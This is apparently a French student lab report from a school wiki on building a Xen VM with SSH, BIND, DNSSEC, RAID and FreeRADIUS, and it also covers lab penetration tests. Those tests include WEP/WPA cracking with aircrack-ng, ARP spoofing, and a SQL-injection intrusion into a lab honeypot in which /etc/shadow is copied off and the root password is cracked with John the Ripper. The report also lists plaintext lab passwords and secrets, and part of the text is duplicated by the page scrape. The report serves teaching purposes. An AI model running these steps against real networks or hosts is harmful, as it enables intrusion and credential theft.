Enfin, nous activons l'IPv6 sur l'interface en modifiant <code>/etc/network/interfaces</code><br />
<br />
iface eth0 inet6 auto<br />
<br />
Pour quitter la VM : CTRL+]<br />
<br />
= Services Internet =<br />
<br />
== Serveur SSH ==<br />
<br />
$ apt install openssh-server<br />
<br />
on édite le fichierde conf <code>/etc/ssh/sshd_config</code> (via ssh key) :<br />
<br />
PermitRootLogin without-password // je l'ai repassé en "yes" suite au mail et le mdp root est celui de pifou habituel <br />
PubkeyAuthentication yes<br />
<br />
après on reload la conf<br />
<br />
$ systemctl reload ssh<br />
<br />
On génère une clé ssh depuis notre VM avec <code>ssh-keygen -t ed25519</code> et on l'ajoute dans <code>/.ssh/authorized_keys</code> et c'est gooooood<br />
<br />
== Serveur DNS ==<br />
<br />
on achète le ndd<br />
<br />
on crée un "Glue Record" pour notre nameserver <code>ns1.belle-rose.site</code><br />
<br />
on install bind<br />
<br />
$ apt install bind9<br />
<br />
on configure <code>/etc/resolv.conf</code><br />
<br />
nameserver 127.0.0.1<br />
<br />
on configure bind <code>/etc/bind/named.conf.local</code><br />
<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
On ajoute nos ns <code>/etc/bind/db.belle-rose.site</code><br />
<br />
;<br />
; BIND dans ta face<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.belle-rose.site. postmaster.belle-rose.site. (<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.belle-rose.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.181<br />
<br />
Ensuite on peut tester notre conf avec<br />
<br />
$ host -t any ns1.belle-rose.site localhost<br />
Using domain server:<br />
Name: localhost<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
ns1.belle-rose.site has address 193.48.57.181<br />
<br />
Et on incrémente aussi le Serial dans <code>/etc/bind/db.belle-rose.site</code> à 3.<br />
<br />
== Certificat ==<br />
<br />
Notre certificat Gandi nous a été retiré de force par quelqu'un de mal intentionné. De ce fait, nous avons utilisé un certificat <code>Let's Encrypt</code>. Après avoir installé <code>certbot</code>, on utilise simplement la commande :<br />
<br />
certbot --apache<br />
<br />
https://www.belle-rose.site/ IZOK<br />
<br />
== DNSSEC ==<br />
<br />
On suit les étapes suivantes :<br />
<br />
1. On ajoute l’option <code>dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code><br />
<br />
2. On crée un répertoire <code>belle-rose.site.dnssec</code> pour y générer les clefs<br />
<br />
3. On crée la clef asymétrique de signature de clefs de zone :<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE belle-rose.site<br />
<br />
4. On crée la clef asymétrique de la zone pour signer les enregistrements<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 1024 -n ZONE belle-rose.site <br />
<br />
5. On renomme les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);<br />
<br />
$ mv Kbelle-rose.site.+005+37138.key belle-rose.site-ksk.key<br />
$ mv Kbelle-rose.site.+005+35638.key belle-rose.site-zsk.key<br />
$ mv Kbelle-rose.site.+005+37138.private belle-rose.site-ksk.private<br />
$ mv Kbelle-rose.site.+005+35638.private belle-rose.site-zsk.private<br />
<br />
6. On inclue les clefs publiques dans votre fichier de zone <code>/etc/bind/db.belle-rose.site</code>, et on incrémente le numéro de version de la zone ;<br />
<br />
$include /etc/bind/belle-rose.site.dnssec/belle-rose.site-ksk.key<br />
$include /etc/bind/belle-rose.site.dnssec/belle-rose.site-zsk.key<br />
<br />
7. On signe les enregistrements de la zone ;<br />
<br />
$ dnssec-signzone -o belle-rose.site -k belle-rose.site-ksk ../db.belle-rose.site belle-rose.site-zsk<br />
<br />
8. On modifie le fichier <code>named.conf.local</code> pour utiliser la zone signée de suffixe .signed :<br />
<br />
$ vim ../named.conf.local<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site.signed";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
9. il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier www.belle-rose.site-ksk.key) à notre registrar (sur gandi.net, dans la section "Manage DNSSEC" puis "DNS servers")<br />
<br />
root@Bellerose:/etc/bind/belle-rose.site.dnssec# cat belle-rose.site-ksk.key <br />
; This is a key-signing key, keyid 22094, for belle-rose.site.<br />
; Created: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
; Publish: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
; Activate: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
belle-rose.site. IN DNSKEY 257 3 5 AwEAAbbNBQJskwFezV1LwDsxAkCVbOcy4X3/mgffMjd/3FIHZpkdVrk3 w88041cgWbVSmom0ma8fFNqntidWlO//rMPvKT0ex3dqCse7on3/odox vxR3Zh5hPdv4K7X35BLuZta4x/RCBLgiFVyXo12qqBl0Htxn2hRyycKv 2caEYwnyRI75KSrr5f5XtQS8LyZCbtmMAp5YJu1wiDxwLcUwwJKvYS+q dtq4sm3KwW+qbjcUswkMMjXNAsvzwZ5FyHcondvvPuErc+Fhdvpxyoq+ W44ynLRnz7cb3R44z/TXFCwNlQI3MWzFvhbDK1YeJLpqjgYrET4eqqka mbFMYuLPQzE=<br />
<br />
(on copie que la partie chiffrée, pas le record DNSKEY)<br />
<br />
10. Enfin, nous pouvons tester la configuration:<br />
<br />
root@Bellerose:~# host -t any belle-rose.site<br />
belle-rose.site has RRSIG record DS 8 2 3600 20220210205226 20220111074233 56238 site. t5ANbAiG69DP5E9ccCIMtEEMs1urP6mSQpb210bDUbCD7vdXqONhLJ9M dcjyHQjhdTWKd9qc48tnY8fwL4PUeOYLexcaUEQgLMkbEBUDMzpcvMsb n4sM2BXgk7lJ9vyE1zsgfBNg7X8IV5c7sRrEuZyg7VbjPYmqx5BJ3cC8 Dy0=<br />
belle-rose.site has DS record 22094 5 2 86D5EAC51853FAA1865BB63C0F353EEB50D5A59093409E66A3F7044C AC3AF70F<br />
belle-rose.site name server ns6.gandi.net.<br />
belle-rose.site name server ns1.belle-rose.site.<br />
belle-rose.site has RRSIG record DNSKEY 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. bh2pFBuNXANoGib6RK5MAab6xy7jbUEYVOr6Pk/pa8weJPD/ACk0Z1pm urvc++ReoccxNxNy+BCd2Ri1GLhZ+kGXrF8xuNUYdyo+zpd+zZUgrx1C hKRSUqeBVpAn0uyDlRtG8cPPw01iYpDBCqmnif7+GblIH6eSJhOf+98d l8o=<br />
belle-rose.site has RRSIG record DNSKEY 5 2 604800 20220210082130 20220111082130 22094 belle-rose.site. JLB0MJqr8rfBq2MiVrZaRyDo/7/7V1GUGwCi108w8CgeUrIdImgXERY4 2nXQ21aym3Po0i+zs5DmEonEkTGMi63kjUG8ZeFjMCFm7KtNhRK8FkQk Be2yzv3odAhh/gmMyRsMa7yoLwaDWZVd4NkCJ6EaqNXP7yspcHD6pmHt 4RKJgCUo6zpLAJnFiU1cwIR+lS/HeFEW2OzOtvi/LH8bL1zewioEpTgi qHLplK68KR/1cX/4Dq2C3CaeChteMx//EkW9Vmwjg9BhRjE/VCa8P80w qJEiXeg8KXYLkCEiBK5ifgKy5EMxDG5q18ieRXaUc0F6FpG0A4POpTVx pscHmA==<br />
belle-rose.site has DNSKEY record 257 3 5 AwEAAbbNBQJskwFezV1LwDsxAkCVbOcy4X3/mgffMjd/3FIHZpkdVrk3 w88041cgWbVSmom0ma8fFNqntidWlO//rMPvKT0ex3dqCse7on3/odox vxR3Zh5hPdv4K7X35BLuZta4x/RCBLgiFVyXo12qqBl0Htxn2hRyycKv 2caEYwnyRI75KSrr5f5XtQS8LyZCbtmMAp5YJu1wiDxwLcUwwJKvYS+q dtq4sm3KwW+qbjcUswkMMjXNAsvzwZ5FyHcondvvPuErc+Fhdvpxyoq+ W44ynLRnz7cb3R44z/TXFCwNlQI3MWzFvhbDK1YeJLpqjgYrET4eqqka mbFMYuLPQzE=<br />
belle-rose.site has DNSKEY record 256 3 5 AwEAAdZrHCSjl8nMZ0pwfODUtCs4nD6iStiZzuBAfWTsm75qpG6JJzpr e3Oqqyr/Dm1bwXbLQUd0GNgGAidiAQtkbZIb/5ZQxuVxft2kp0GKUr34 44Bw1Gh8af1Npk9cqK368U6oD+EIrV2AnA2KC/KXm+DziNOkmifaFVvO rh6p91Ut<br />
belle-rose.site has RRSIG record NSEC 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. RXnysXybktajyP82ERJn1m9z/5dkOQABIzfUPf2/08jFQq96AMmEggH2 sAy/3wv6SKiwAvBN3dFkYtIefMAK0MdLykIwwLrGQwK1BSv5KKLCowtO Bdks2pjgBPFE4J/MnBnBXSm0HunudjziNgz+PN3bY/IieyPzIBfpHM0y UfM=<br />
belle-rose.site has NSEC record ns1.belle-rose.site. NS SOA RRSIG NSEC DNSKEY<br />
belle-rose.site has RRSIG record NS 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. GZRzkPkOu/RKjCE2+NWhHfTcicDCoaBq/QjimrrVPsMcse0pPebFZkTr lRHMLHZEglzopIigLwj3DQ7yjuB6EiAhudUWwZri82LjkVs+z5ItMPo6 kudNvs5oUqVGX7E6toy5rU11yBgPDNijuCI1aahUJpwAEOl9sGi9uJ9I NaI=<br />
belle-rose.site has RRSIG record SOA 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. rDQsyAPj2RG4epQ7AFGrpU4JzyAi1kif3X4N8L+53IrlNWMcByyCVtAA 1XRQ8+Ag7f8/Z7nMhLbRuPtEH6efhZJfhEOuuU0SK7Nernm6WgkCS4UI e4VVtXtbHLeM+CncfUywqpKRhyZB9qEpzloNdI6zyOlzS9bH9qMwZFSS TWY=<br />
belle-rose.site has SOA record ns1.belle-rose.site. postmaster.belle-rose.site. 6 604800 86400 2419200 604800<br />
<br />
= Tests d'intrusion =<br />
<br />
== Exploitation de failles du système ==<br />
<br />
Après plusieurs recherches, nous avons trouvé un petit soft permettant d'audit notre système et y afficher les possibles failles. > https://github.com/mzet-/linux-exploit-suggester<br />
<br />
En suivant la documentation :<br />
<br />
$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh<br />
$ chmod +x les.sh && ./les.sh<br />
<br />
On obtient les failles suivantes (audit réalisé sur notre VM) :<br />
<br />
[+] [CVE-2021-27365] linux-iscsi<br />
...<br />
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write<br />
...<br />
[+] [CVE-2019-13272] PTRACE_TRACEME<br />
...<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On commence par rechercher le nom de notre interface. On utilise alors la commande (en root) :<br />
<br />
$ airmon-ng<br />
<br />
On trouve l'interface suivante :<br />
<br />
wlx40a5ef0127d0<br />
<br />
On essaie de démarrer l'interface sur le channel 3 :<br />
<br />
$ airmon-ng start wlx40a5ef0127d0 3<br />
<br />
Or on remarque que la réponse de la commande nous indique que l'interface a été renommé automatiquement "wlan0mon". On ré-utilise la commande précédente avec le nouveau nom d'interface :<br />
<br />
$ airmon-ng start wlan0mon 3<br />
<br />
On écoute ensuite tous les paquets dans l'air :<br />
<br />
$ airodump-ng wlan0mon<br />
<br />
A partir de là, on peut choisir un point d'accès à cracker en utilisant son BSSID (obtenu par la commande précédente). On choisit cracotte06.<br />
<br />
$ aireplay-ng -9 -e cracotte06 -a 04:DA:D2:9C:50:55 wlan0mon<br />
<br />
On peut récupérer les VI générés par le point d'accès en les stockant dans les fichiers output. On donne le channel 4 puisque le point d'accès est sur ce channel :<br />
<br />
$ airodump-ng -c 4 --bssid 04:DA:d2:9C:50:55 -w output wlan0mon<br />
<br />
On effectue de fausses authentifications avec la commande aireplay-ng dans un nouveau terminal :<br />
<br />
$ aireplay-ng -1 0 -e cracotte06 -a 04:DA:D2:9C:50:55 -h 40:A5:EF:01:0E:5F wlan0mon<br />
<br />
L'adresse MAC source donnée après le -h est obtenue lorsque l'on récupère les VI.<br />
<br />
Il faut maintenant laisser tourner la commande de récupération des VI assez longtemps pour obtenir assez de données (pour nous içi il a fallu attendre 40000 datas). On peut ensuite décrypter la clef WEP :<br />
<br />
$ aircrack-ng -b 04:DA:D2:9C:50:55 output*.cap<br />
<br />
On obtient alors :<br />
<br />
KEY FOUND ! [ 55:55:55:55:5A:BC:07:CB:A4:44:44:44:44 ]<br />
Decrypted correctly: 100%<br />
<br />
== Cassage de mot de passe WPA-PSK par force brute ==<br />
<br />
$ airmon-ng<br />
$ airmon-ng start wlan0mon 9<br />
$ airodump-ng wlan0mon<br />
<br />
On choisit le point d'accès kracotte06 à cracker. On récupère son BSSID avec la commande précédente et on utilise :<br />
<br />
$ airodump-ng -c 4 --bssid 44:AD:D9:5F:87:05 -w psk wlan0mon<br />
<br />
On crée le dictionnaire contenant toutes les clefs à tester avec la commande <code>crunch</code><br />
<br />
$ crunch 8 8 0123456789 -o dictionnaire.lst<br />
<br />
Pour savoir si un Handshake a été trouvé, on utilise la commande :<br />
<br />
$ aircrack-ng psk*.cap<br />
<br />
On trouve : <br />
<br />
# BSSID ESSID Encryption<br />
1 44:AD:D9:5F:87:05 kracotte06 WPA (1 handshake)<br />
<br />
On peut alors lancer la commande de test des clefs :<br />
<br />
$ aircrack-ng -w dictionnaire.lst -b 44:AD:D9:5F:87:05 psk*.cap<br />
<br />
Après un peu d'attente, on obtient la clef suivante :<br />
<br />
KEY FOUND! [ 59906999 ]<br />
<br />
== Attaque de type "homme au milieu" par usurpation ARP ==<br />
<br />
On branche un PC bleu sur une zabeth en ethernet et on lui configure une IP. Ensuite on peut installer dsniff et wireshark.<br />
<br />
On fait :<br />
<br />
$ echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Puis on se fait passer pour le routeur (172.26.145.254) auprès de la zabeth (172.26.145.61):<br />
<br />
$ arpspoof -t 172.26.145.61 172.26.145.254<br />
<br />
En lançant wireshark, on peut voir les informations envoyées par la zabeth passer en clair.<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
Sur honey.plil.info : <br />
<br />
1. injection SQL<br />
<br />
2. connexion en tant qu'admin<br />
<br />
3. telechargement du fichier "config-db.php" (On remarque que il existe une BDD phpmyadmin) et "database.php" (ce fichier semble lui ne pas nous apporter d'informations)<br />
<br />
4. honey.plil.info/phpmyadmin -> connexion avec les logins trouvés dans le fichier "config-db.php" (phpmyadmin et gencovid19). On trouve alors une table "pma_users" indiquant le nom de plusieurs utilisateurs (totor62, manuals, phpmyadmin et root).<br />
<br />
5. en essayant le mdp "gencovid19" avec ces identifiants sur phpmyadmin : on peut se connecter en tant que "root" sur la BDD et on trouve le mdp de rex dans la bdd "test" et table "users".<br />
<br />
6. connexion en ssh sur rex@honey.plil.info.<br />
<br />
7. comme indication : "le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets". Alors on va créer un fichier de mots de 4 lettre pour ensuite doubler ces mots (exemple : bobo => bobobobo) pour essayer de cracker le mot de passe par la force brute. On créée alors le dictionnaire avec l'utilitaire crunch comme pour obtenir les clefs WEP :<br />
<br />
$ crunch 4 4 abcdefghijklmnopqrstuvwxyz > dico.txt<br />
<br />
Et on double la taille des mots :<br />
<br />
$ sed -i 's/\(.*\)/\1\1/' dico.txt<br />
<br />
On copie ensuite les fichiers "/etc/passwd" et "/etc/shadow" de rex@honey.plil.info sur notre zabeth. <br />
<br />
$ scp rex@honey.plil.info:/etc/passwd .<br />
$ scp rex@honey.plil.info:/etc/shadow .<br />
<br />
On utilise alors l'utilitaire "shadow" pour obtenir un fichier contenant le mot de passe haché de root :<br />
<br />
$ unshadow passwd shadow | head -1 > honey<br />
<br />
Puis on utilise "John the Ripper" pour cracker le mot de passe :<br />
<br />
$ john -w:dico.txt honey<br />
<br />
Après quelques minutes, on peut afficher le mot de passe trouvé :<br />
<br />
$ john --show honey<br />
root:fortfort:0:0:root:/root:/bin/bash<br />
1 password hash cracked, 0 left<br />
<br />
On trouve le mot de passe de root@honey.plil.info qui est "fortfort".<br />
<br />
= Point d'accès Wi-Fi authentifié via FreeRADIUS =<br />
<br />
== Configuration du point d'accès ==<br />
<br />
=== Point d'accès ===<br />
<br />
Tout d'abord il faut configurer l'authentification EAP dans la configuration :<br />
<br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_rose group radius_rose<br />
radius-server host 193.48.57.181 auth-port 1812 acct-port 1813 key zinzin<br />
aaa group server radius radius_rose<br />
server 193.48.57.181 auth-port 1812 acct-port 1813<br />
exit<br />
<br />
Configurons le SSID :<br />
<br />
conf t<br />
<br />
dot11 ssid SSID_ROSE<br />
vlan 5<br />
authentication open eap eap_rose<br />
authentication network-eap eap_rose<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
exit<br />
<br />
On associe notre SSID à l'interface WIFI :<br />
<br />
conf t<br />
<br />
interface Dot11Radio0<br />
encryption vlan 5 mode ciphers aes-ccm tkip<br />
ssid SSID_ROSE<br />
mbssid<br />
exit<br />
exit<br />
<br />
On paramètre notre VLAN (5)<br />
<br />
conf t<br />
<br />
interface Dot11Radio0.5<br />
encapsulation dot1Q 5<br />
no ip route-cache<br />
bridge-group 5<br />
bridge-group 5 subscriber-loop-control<br />
bridge-group 5 spanning-disabled<br />
bridge-group 5 block-unknown-source<br />
exit<br />
exit<br />
<br />
On configure l'interface filaire<br />
<br />
conf t<br />
<br />
interface GigabitEthernet0.5<br />
encapsulation dot1Q 5<br />
bridge-group 5<br />
exit<br />
exit<br />
<br />
Enfin, on configure l'IP de l'AP et sa gateway<br />
<br />
conf t<br />
<br />
ip default-gateway 10.1.0.1<br />
interface BVI 1<br />
ip address 10.1.0.3 255.255.255.0<br />
exit<br />
exit<br />
<br />
=== Routeur ===<br />
<br />
Commençons par configurer le VLAN 1 <br />
<br />
conf t<br />
<br />
interface vlan 1<br />
ip address 10.1.0.1 255.255.255.0<br />
exit<br />
exit<br />
<br />
Puis on configure le port (ici Gi1/0/3<br />
<br />
conf t<br />
<br />
interface Gi1/0/3<br />
switchport<br />
switchport mode trunk<br />
switchport trunk allowed vlan add 1<br />
exit<br />
exit<br />
<br />
Et voilà mon grand<br />
<br />
== Serveur FreeRADIUS ==<br />
<br />
Installation de freeRADIUS<br />
<br />
apt install freeradius<br />
<br />
On commence par configurer <code>/etc/freeradius/3.0/clients.conf</code> à détailler<br />
<br />
client zozo {<br />
ipaddr = 10.1.0.3/24<br />
secret = zinzin<br />
}<br />
<br />
ensuite <code>/etc/freeradius/3.0/eap.conf</code><br />
<br />
eap {<br />
[...]<br />
default_eap_type = peap<br />
}<br />
<br />
puis <code>/etc/freeradius/3.0/users</code><br />
<br />
[...]<br />
root Cleartext-Password := "glopglop"<br />
<br />
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug <code>freeradius -X</code> (après avoir au préalable stoppé le processus)<br />
<br />
= Réalisations =<br />
<br />
== Sécurisation des données (RAID 5) ==<br />
<br />
Nous avons besoin de 3 LV à rajouter à notre VM :<br />
<br />
$ lvcreate -L1G -n Bellerose-raid1 storage<br />
$ lvcreate -L1G -n Bellerose-raid2 storage<br />
$ lvcreate -L1G -n Bellerose-raid3 storage<br />
<br />
Nous pouvons ainsi les rajouter à la configuration de notre VM (<code>/etc/xen/Bellerose.cfg</code>):<br />
<br />
'phy:/dev/storage/Bellerose-raid1,xvda5,w'<br />
'phy:/dev/storage/Bellerose-raid2,xvda6,w'<br />
'phy:/dev/storage/Bellerose-raid3,xvda7,w'<br />
<br />
Nous pouvons ensuite créer le RAID en relançant la VM et en se connectant dessus.<br />
<br />
$ apt install mdadm<br />
<br />
On va ensuite créer un disque nommé <code>/dev/md0</code> grâce à <code>mdadm</code> :<br />
<br />
$ mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7<br />
<br />
On peut ainsi vérifier que notre RAID 5 est effectif :<br />
<br />
$ lsblk<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
xvda5 202:5 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda6 202:6 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda7 202:7 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
<br />
Enfin il faut monter ce disque fraîchement créé :<br />
<br />
$ mkfs.ext4 /dev/md0<br />
$ mkdir /media/raid<br />
<br />
on ajoute cette ligne dans <code>/etc/fstab</code> :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
puis<br />
<br />
$ mount -a<br />
<br />
et toc<br />
<br />
== Chiffrement des données ==<br />
<br />
On branche la clé USB sur le petit PC bleu, et on lance <code>lsblk</code> et on trouve :<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
sda 8:0 1 7,2G 0 disk <br />
<br />
Donc on peut formater la clef qui contient déjà quelque chose dessus :<br />
<br />
$ mkfs.ext4 /dev/sda<br />
<br />
Avec <code>cryptsetup</code> on peut initialiser la clef et lui donner un mdp :<br />
<br />
$ cryptsetup luksFormat /dev/sda<br />
<br />
On crée une partition chiffrée sur la clé :<br />
<br />
$ cryptsetup luksOpen /dev/sda data<br />
<br />
Et on formate :<br />
<br />
$ mkfs.ext4 /dev/mapper/data<br />
<br />
On monte cette partition pour lui permettre de contenir des fichiers :<br />
<br />
$ mkdir /mnt/data-usb<br />
$ mount -t ext4 /dev/mapper/data /mnt/data-usb<br />
<br />
On y ajoute donc un fichier de test :<br />
<br />
$ touch /mnt/data-usb/boujour.txt<br />
<br />
Puis on démonte et on ferme le volume chiffré<br />
<br />
$ umont /mnt/data-usb<br />
$ cryptsetup luksClose data<br />
<br />
Ensuite en branchant la clé USB sur un autre PC pour voir le fonctionnement de notre chiffrement, et lorsqu'on essaie d'accèder à la clef, celle ci nous demande un mot de passe pour accèder aux fichiers, donc le chiffrement fonctionne correctement.</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G6&diff=57836TP sysres IMA5 2021/2022 G62022-01-11T14:37:45Z<p>Bjacquot : /* Réalisations */</p>
<hr />
<div>__TOC__<br />
<br style="clear: both;"/><br />
<br />
=Création de la machine virtuelle=<br />
<br />
On veut créer notre machine virtuelle sur l'hyperviseur (HV) capbreton. Afin de pouvoir télécharger l'image Debian, on utilise tout d'abord la commande suivante :<br />
<br />
$ export http_proxy=http://proxy.plil.fr:3128<br />
<br />
Pour lancer la création de la machine virtuelle, on doit donner le nom de la machine qui sera Bellerose (d'après le thème des noms de bière). Ensuite nous avons l'adresse IP qui nous a été attribuée lors de la répartition des groupes (donc pour nous ce sera 193.48.57.181). On donne aussi l'adresse IP du routeur flottant (193.48.57.190) et le masque du réseau (255.255.255.240 car c'est un /28). On indique également l'emplacement des disques virtuels : /usr/local/xen, le mot de passe pour se connecter à la machine virtuelle : pasglop, et la distribution que nous allons utiliser qui est Debian bullseye.<br />
<br />
$ xen-create-image --hostname=Bellerose --ip=193.48.57.181 --gateway=193.48.57.190 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
On crée ensuite 2 LV de 10 Go (nommés Bellerose1 et Bellerose2) sur le groupe de volume storage.<br />
<br />
$ lvcreate -L10G -n Bellerose1 storage<br />
$ lvcreate -L10G -n Bellerose2 storage<br />
<br />
Puis il faut les formater au format ext4, alors on utilise les commandes suivantes :<br />
<br />
$ mkfs.ext4 /dev/storage/Bellerose1<br />
$ mkfs.ext4 /dev/storage/Bellerose2<br />
<br />
On modifie notre fichier /etc/xen/Bellerose.cfg pour indiquer à la machine virtuelle qu'elle possède les volumes logiques Bellerose1 et Bellerose2 (on ajoute alors 2 lignes dans la fonction disk) et on ajoute le bridge IMA5sc dans la fonction vif.<br />
<br />
$ vim /etc/xen/Bellerose.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Bellerose1,xvda3,w',<br />
'phy:/dev/storage/Bellerose2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.181 ,mac=00:16:3E:FA:D0:95 ,bridge=IMA5sc' ]<br />
<br />
On peut maintenant lancer notre machine virtuelle :<br />
<br />
$ xl create -c /etc/xen/Bellerose.cfg<br />
<br />
Avec la commande :<br />
<br />
$ cat /etc/fstab<br />
<br />
On voit xvda1 et xvda2. On va créer xvda3 et xvda4 pour pouvoir y mettre les répertoires var et home de notre machine virtuelle :<br />
<br />
$ mkdir /mnt/xvda3<br />
$ mkdir /mnt/xvda4<br />
$ mount /dev/xvda3 /mnt/xvda3<br />
$ mount /dev/xvda4 /mnt/xvda4<br />
<br />
Puis on déplace le répertoire var dans le disque xvda4 :<br />
<br />
$ mv /var/* /mnt/xvda4<br />
<br />
Pour monter les disques, on ajoute ces lignes dans le fichier /etc/fstab :<br />
<br />
# /home vers xvda3<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
# /var vers xvda4<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On monte le tout à l'aide de la commande :<br />
<br />
mount -a<br />
<br />
Enfin avec lsblk, on peut voir les deux partitions de notre VM :<br />
<br />
$ lsblk<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
Enfin, nous activons l'IPv6 sur l'interface en modifiant <code>/etc/network/interfaces</code><br />
<br />
iface eth0 inet6 auto<br />
<br />
Pour quitter la VM : CTRL+]<br />
<br />
= Services Internet =<br />
<br />
== Serveur SSH ==<br />
<br />
$ apt install openssh-server<br />
<br />
on édite le fichierde conf <code>/etc/ssh/sshd_config</code> (via ssh key) :<br />
<br />
PermitRootLogin without-password // je l'ai repassé en "yes" suite au mail et le mdp root est celui de pifou habituel <br />
PubkeyAuthentication yes<br />
<br />
après on reload la conf<br />
<br />
$ systemctl reload ssh<br />
<br />
On génère une clé ssh avec <code>ssh-keygen -t ed25519</code> et on l'ajoute dans <code>/.ssh/authorized_keys</code> et c'est gooooood<br />
<br />
== Serveur DNS ==<br />
<br />
on achète le ndd<br />
<br />
on crée un "Glue Record" pour notre nameserver <code>ns1.belle-rose.site</code><br />
<br />
on install bind<br />
<br />
$ apt install bind9<br />
<br />
on configure <code>/etc/resolv.conf</code><br />
<br />
nameserver 127.0.0.1<br />
<br />
on configure bind <code>/etc/bind/named.conf.local</code><br />
<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
On ajoute nos ns <code>/etc/bind/db.belle-rose.site</code><br />
<br />
;<br />
; BIND dans ta face<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.belle-rose.site. postmaster.belle-rose.site. (<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.belle-rose.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.181<br />
<br />
Ensuite on peut tester notre conf avec<br />
<br />
$ host -t any ns1.belle-rose.site localhost<br />
Using domain server:<br />
Name: localhost<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
ns1.belle-rose.site has address 193.48.57.181<br />
<br />
Et on incrémente aussi le Serial dans <code>/etc/bind/db.belle-rose.site</code> à 3.<br />
<br />
== Certificat ==<br />
<br />
Notre certificat Gandi nous a été retiré de force par quelqu'un de mal intentionné. De ce fait, nous avons utilisé un certificat <code>Let's Encrypt</code>. Après avoir installé <code>certbot</code>, on utilise simplement la commande :<br />
<br />
certbot --apache<br />
<br />
https://www.belle-rose.site/ IZOK<br />
<br />
== DNSSEC ==<br />
<br />
On suit les étapes suivantes :<br />
<br />
1. On ajoute l’option <code>dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code><br />
<br />
2. On crée un répertoire <code>belle-rose.site.dnssec</code> pour y générer les clefs<br />
<br />
3. On crée la clef asymétrique de signature de clefs de zone :<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE belle-rose.site<br />
<br />
4. On crée la clef asymétrique de la zone pour signer les enregistrements<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 1024 -n ZONE belle-rose.site <br />
<br />
5. On renomme les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);<br />
<br />
$ mv Kbelle-rose.site.+005+37138.key belle-rose.site-ksk.key<br />
$ mv Kbelle-rose.site.+005+35638.key belle-rose.site-zsk.key<br />
$ mv Kbelle-rose.site.+005+37138.private belle-rose.site-ksk.private<br />
$ mv Kbelle-rose.site.+005+35638.private belle-rose.site-zsk.private<br />
<br />
6. On inclue les clefs publiques dans votre fichier de zone <code>/etc/bind/db.belle-rose.site</code>, et on incrémente le numéro de version de la zone ;<br />
<br />
$include /etc/bind/belle-rose.site.dnssec/belle-rose.site-ksk.key<br />
